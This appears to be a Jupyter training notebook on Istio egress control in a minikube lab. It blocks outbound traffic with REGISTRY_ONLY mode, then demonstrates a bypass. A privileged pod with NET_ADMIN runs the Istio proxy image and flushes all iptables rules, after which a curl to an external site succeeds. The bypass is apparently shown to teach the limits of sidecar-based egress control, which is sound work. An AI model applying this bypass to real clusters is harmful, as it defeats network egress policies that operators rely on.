**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

# Istio Egress Control and Hack

Starting [Istio Egress Control](https://istio.io/latest/docs/tasks/traffic-management/egress/egress-control/)

In [1]:
cd istio-*
pwd

/minikube-host/training/notebooks/istio-1.8.2


In [1]:
kubectl label namespace default istio-injection=enabled

namespace/default labeled


# Check defaults

In [11]:
kubectl get istiooperator installed-state -n istio-system -o jsonpath='{.spec.meshConfig.outboundTrafficPolicy.mode}'


REGISTRY_ONLY

In [4]:
export PATH=$PATH:$(pwd)/bin

In [5]:
istioctl install --set profile=demo -y --set meshConfig.outboundTrafficPolicy.mode=ALLOW_ANY


✔ Istio core installed                                                          
✔ Istiod installed                                                              
✔ Egress gateways installed                                                     
✔ Ingress gateways installed                                                    
✔ Installation complete                                                         

# Create test pod

In [28]:
kubectl apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
  name: sleep
  labels:
    app: sleep
spec:
  ports:
  - port: 80
    name: http
  selector:
    app: sleep
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: sleep
spec:
  replicas: 1
  selector:
    matchLabels:
      app: sleep
  template:
    metadata:
      labels:
        app: sleep
    spec:
      containers:
      - name: sleep
        image: pstauffer/curl
        command: ["/bin/sleep", "3650d"]
        imagePullPolicy: IfNotPresent
---
EOF

service/sleep created
deployment.apps/sleep created


In [7]:
kubectl get pods

NAME                    READY   STATUS    RESTARTS   AGE
sleep-56bc8d768-fmxxt   2/2     Running   0          57m


In [8]:
export POD=$(kubectl get pods -l app=sleep -o jsonpath='{.items[0].metadata.name}')
echo $POD

sleep-56bc8d768-fmxxt


In [9]:
kubectl exec -c sleep $POD -- curl -s  heise.de

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.heise.de/">here</a>.</p>
</body></html>


# Works as intended, let us block it

In [10]:
istioctl install --set profile=demo -y --set meshConfig.outboundTrafficPolicy.mode=REGISTRY_ONLY

✔ Istio core installed                                                          
✔ Istiod installed                                                              
✔ Egress gateways installed                                                     
✔ Ingress gateways installed                                                    
✔ Installation complete                                                         

In [16]:
kubectl exec -c sleep $POD -- curl heise.de

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0


In [17]:
kubectl get pods $POD -o yaml

apiVersion: v1
kind: Pod
metadata:
  annotations:
    prometheus.io/path: /stats/prometheus
    prometheus.io/port: "15020"
    prometheus.io/scrape: "true"
    sidecar.istio.io/status: '{"version":"e2cb9d4837cda9584fd272bfa1f348525bcaacfadb7e9b9efbd21a3bb44ad7a1","initContainers":["istio-init"],"containers":["istio-proxy"],"volumes":["istio-envoy","istio-data","istio-podinfo","istio-token","istiod-ca-cert"],"imagePullSecrets":null}'
  creationTimestamp: "2021-01-27T13:38:58Z"
  generateName: sleep-56bc8d768-
  labels:
    app: sleep
    istio.io/rev: default
    pod-template-hash: 56bc8d768
    security.istio.io/tlsMode: istio
    service.istio.io/canonical-name: sleep
    service.istio.io/canonical-revision: latest
  managedFields:
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:metadata:
        f:generateName: {}
        f:labels:
          .: {}
          f:app: {}
          f:pod-template-hash: {}
        f:ownerReferences:
          .: {}
          k:{"uid":"da

# The hack

- same image as above
- we use the original istio proxy image
  - iptables included
  - `NET_ADMIN` capability not detected
  - revert the iptables rules

In [18]:
kubectl apply -f -<<EOF
apiVersion: v1
kind: Pod
metadata:
  name: escape
  namespace: default
spec:
  containers:
  - name: sleep
    image: pstauffer/curl
    command: ["/bin/sleep", "3650d"]
    imagePullPolicy: IfNotPresent
  - image: docker.io/istio/proxyv2:1.8.2
    name: escape
    command:
      - "/bin/bash"
    args:
      - "-c"
      - |+
        echo
        echo "########  old rules ###########"
        echo
        iptables-save
        echo
        echo "######## cleared rules ##########"
        echo
        iptables -P INPUT ACCEPT
        iptables -P FORWARD ACCEPT
        iptables -P OUTPUT ACCEPT
        iptables -t nat -F
        iptables -t mangle -F
        iptables -F
        iptables -X
        iptables-save
        sleep 3650d
    securityContext:
      capabilities:
        add:
        - NET_ADMIN
      privileged: true
  restartPolicy: Always
EOF

pod/escape created


In [21]:
kubectl get pods 

NAME                    READY   STATUS    RESTARTS   AGE
escape                  3/3     Running   0          11s
sleep-56bc8d768-fmxxt   2/2     Running   0          62m


In [22]:
kubectl get pods escape -o yaml

apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"escape","namespace":"default"},"spec":{"containers":[{"command":["/bin/sleep","3650d"],"image":"pstauffer/curl","imagePullPolicy":"IfNotPresent","name":"sleep"},{"args":["-c","echo\necho \"########  old rules ###########\"\necho\niptables-save\necho\necho \"######## cleared rules ##########\"\necho\niptables -P INPUT ACCEPT\niptables -P FORWARD ACCEPT\niptables -P OUTPUT ACCEPT\niptables -t nat -F\niptables -t mangle -F\niptables -F\niptables -X\niptables-save\nsleep 3650d\n"],"command":["/bin/bash"],"image":"docker.io/istio/proxyv2:1.8.2","name":"escape","securityContext":{"capabilities":{"add":["NET_ADMIN"]},"privileged":true}}],"restartPolicy":"Always"}}
    prometheus.io/path: /stats/prometheus
    prometheus.io/port: "15020"
    prometheus.io/scrape: "true"
    sidecar.istio.io/status: '{"version":"e2cb

In [23]:
kubectl logs escape -c escape


########  old rules ###########

# Generated by iptables-save v1.6.1 on Wed Jan 27 14:41:21 2021
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:ISTIO_INBOUND - [0:0]
:ISTIO_IN_REDIRECT - [0:0]
:ISTIO_OUTPUT - [0:0]
:ISTIO_REDIRECT - [0:0]
-A PREROUTING -p tcp -j ISTIO_INBOUND
-A OUTPUT -p tcp -j ISTIO_OUTPUT
-A ISTIO_INBOUND -p tcp -m tcp --dport 15008 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 22 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15090 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15021 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15020 -j RETURN
-A ISTIO_INBOUND -p tcp -j ISTIO_IN_REDIRECT
-A ISTIO_IN_REDIRECT -p tcp -j REDIRECT --to-ports 15006
-A ISTIO_OUTPUT -s 127.0.0.6/32 -o lo -j RETURN
-A ISTIO_OUTPUT ! -d 127.0.0.1/32 -o lo -m owner --uid-owner 1337 -j ISTIO_IN_REDIRECT
-A ISTIO_OUTPUT -o lo -m owner ! --uid-owner 1337 -j RETURN
-A ISTIO_OUTPUT -m owner --uid-owner 1337 -j RETURN
-A ISTIO_OUTPUT !

In [24]:
kubectl exec -it escape -c sleep -- curl -s heise.de 

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.heise.de/">here</a>.</p>
</body></html>


In [25]:
kubectl exec -it escape -c sleep -- curl -sL heise.de | wc

  28097   26859  555576


In [26]:
kubectl get pods --all-namespaces

NAMESPACE      NAME                                    READY   STATUS    RESTARTS   AGE
default        escape                                  3/3     Running   0          5m19s
default        sleep-56bc8d768-fmxxt                   2/2     Running   0          67m
istio-system   istio-egressgateway-64d976b9b5-j4c6j    1/1     Running   0          72m
istio-system   istio-ingressgateway-68c86b9fc8-8tdmg   1/1     Running   0          72m
istio-system   istiod-5c986fb85b-ngjb7                 1/1     Running   0          72m
kube-system    coredns-74ff55c5b-bkjw8                 1/1     Running   1          21h
kube-system    etcd-minikube                           1/1     Running   1          21h
kube-system    kube-apiserver-minikube                 1/1     Running   1          21h
kube-system    kube-controller-manager-minikube        1/1     Running   1          21h
kube-system    kube-proxy-cxzrh                        1/1     Running   1          21h
kube-system    kube-scheduler-

In [20]:
istioctl 

Istio configuration command line utility for service operators to
debug and diagnose their Istio mesh.

Usage:
  istioctl [command]

Available Commands:
  analyze         Analyze Istio configuration and print validation messages
  authz           (authz is experimental. Use `istioctl experimental authz`)
  bug-report      Cluster information and log capture support tool.
  convert-ingress Convert Ingress configuration into Istio VirtualService configuration [Deprecated, it will be removed in Istio 1.9]
  dashboard       Access to Istio web UIs
  deregister      De-registers a service instance [Deprecated, it will be removed in Istio 1.9]
  experimental    Experimental commands that may be modified or deprecated
  help            Help about any command
  install         Applies an Istio manifest, installing or reconfiguring Istio on a cluster.
  kube-inject     Inject Envoy sidecar into Kubernetes pod resources
  manifest        Commands related to Istio manifests
  operator        Comm

In [22]:
istioctl analyze

Error [IST0101] (VirtualService bookinfo.default) Referenced host not found: "productpage"
Error: Analyzers found issues when analyzing namespace: default.
See https://istio.io/v1.8/docs/reference/config/analysis for more information about causes and resolutions.


: 79